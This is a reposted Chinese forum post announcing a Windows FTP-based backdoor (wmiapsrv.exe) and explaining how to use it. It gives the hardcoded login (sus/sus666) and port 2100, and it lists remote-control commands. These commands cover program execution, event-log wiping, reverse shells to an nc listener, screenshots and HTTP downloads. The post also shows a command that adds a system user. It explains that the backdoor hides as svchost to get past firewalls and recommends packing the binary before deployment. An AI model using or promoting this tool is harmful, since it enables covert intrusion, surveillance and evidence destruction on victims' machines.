文章作者：单克隆抗体
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：文章首发东南大学网络安全联盟论坛(www.bestseu.com/sus/)，后由作者友情提交到邪恶八进制信息安全团队技术论坛，转载请注明首发站点。

这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序，任何时间，任何地点，想怎么控制，就怎么玩。再加上它原创免杀的特性.怎么样，跃跃欲试了吧？

这次发布的是测试版，压缩包内共一个文件wmiapsrv.exe。测试方法：将其解压到一个不含空格的目录里，如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。

只需用任一款ftp连接工具（包括windows自带的ftp和IE），ip地址填服务端ip，端口填2100，用户名填sus，密码填sus666，确定后服务端的c:盘便立刻展现在眼前。

再看看其它的控制功能怎么实现的呢？
这里提供2种方法：

1.
telnet <服务端ip> 2100
输入user sus
pass sus666
待它显示Logged on后，便可以输入后门控制命令，如pslist。

2.
运行ftp.exe，然后输入open <服务端ip> 2100，按照提示输入用户名sus，密码sus666便登陆进去了。除了运行传统的ftp命令外，这里还可以用quote加上马上要提到的后门控制命令，如quote pslist。

专用的后门控制命令如下，这些在你输入help的时候显示出来。
######################################################################
Thank you for using the SUS's FTP BackDoor! Welcome to SUS!
Author: dklkt Date: 2007.7
######################################################################

WINEXEC <exefilepath> Using this to execute an executable file.
SHELLEXECUTE <exefilepath> The same to above.
SETHOMEDIR <ftp's homedir> Set the home directory of ftp's. Default is C:\
GETSYSINFO Get some system infomation
PSLIST List the Process on the system
PSKILL <PID> Kill a process by its pid
VIEWTERMPORT View Terminal Service's port. Default is 3389
SETTERMPORT <PortNum> Set the Terminal Service's Port.
INSTALLTERM Install Terminal Service.
CLEANEVENT Clean the system event logs.
ENUMSERVICE List all the services in the system.
STARTSERVICE <ServcieName> Start a service. Like "net start"
STOPSERVICE <ServiceName> Stop a service.
DELETESERVICE <ServiceName> Delete a service.
VIEWSERVICE <ServiceName> View the detail of a service.
CONFIGSERVICE <ServiceName> <Type> Change service type(Auto,Demand,Disable)
REBOOT Reboot the system.
SHUTDOWN Power off the system.
STOPBACKDOOR Stop the Ftp Backdoor without uninstall it.
SENDBACKSHELL <ip> <port> Send a back cmdshell. Use nc listen first
STARTSHELL <port> Start a cmdshell and listen. You can telnet it.
CATCHSCREEN <bmpfilepath> Catch the screen now and save it to a bmp file.
HTTPDOWNLOAD <filepath> <httpaddress> Download a file using http protocol.
UNINSTALL Uninstall the Ftp Backdoor!
-------------------------------------------------
Good Luck! :-)

（本人英语比较搓，大家意会便可，语法问题多多 ^_^）

比如你在telnet模式下，想运行c:\mm.exe这个程序，便输入
winexec c:\mm.exe

在ftp模式下，想添加一个系统用户，可以输入
quote shellexecute net.exe user aaa /add

在telnet模式下,想修改ftp服务的home目录位置到d:盘，可以输入
sethomedir d:\

相应的的，ftp模式下，前面加上quote
quote sethomedir d:\

另外，虽然这是测试版，但特意没有加壳。你也可以根据需要手动修改用户名和密码。只需用UltraEdit等工具查找sus666等字符串修改即可。端口也是可以修改的，2100对应的16进制是834，因为是反序的，所以你查找34 08这两个字节就可以了，大约是在第a230那一行，改成相应的就行。比如想改成21，就把它改成15 00。希望大家自己用用就好，没必要对外传播。还有最好自己加个壳再拿去做后门。

差点忘了。把特性说明下：
本后门是替换系统服务自启动的，启动后伪装成svchost进程（相似程度100％）穿透防火墙。估计一般的辅助工具不容易查出来，这里你可以使用stopbackdoor命令停止后门，用uninstall命令卸载后门。
本文出自 51CTO.COM技术博客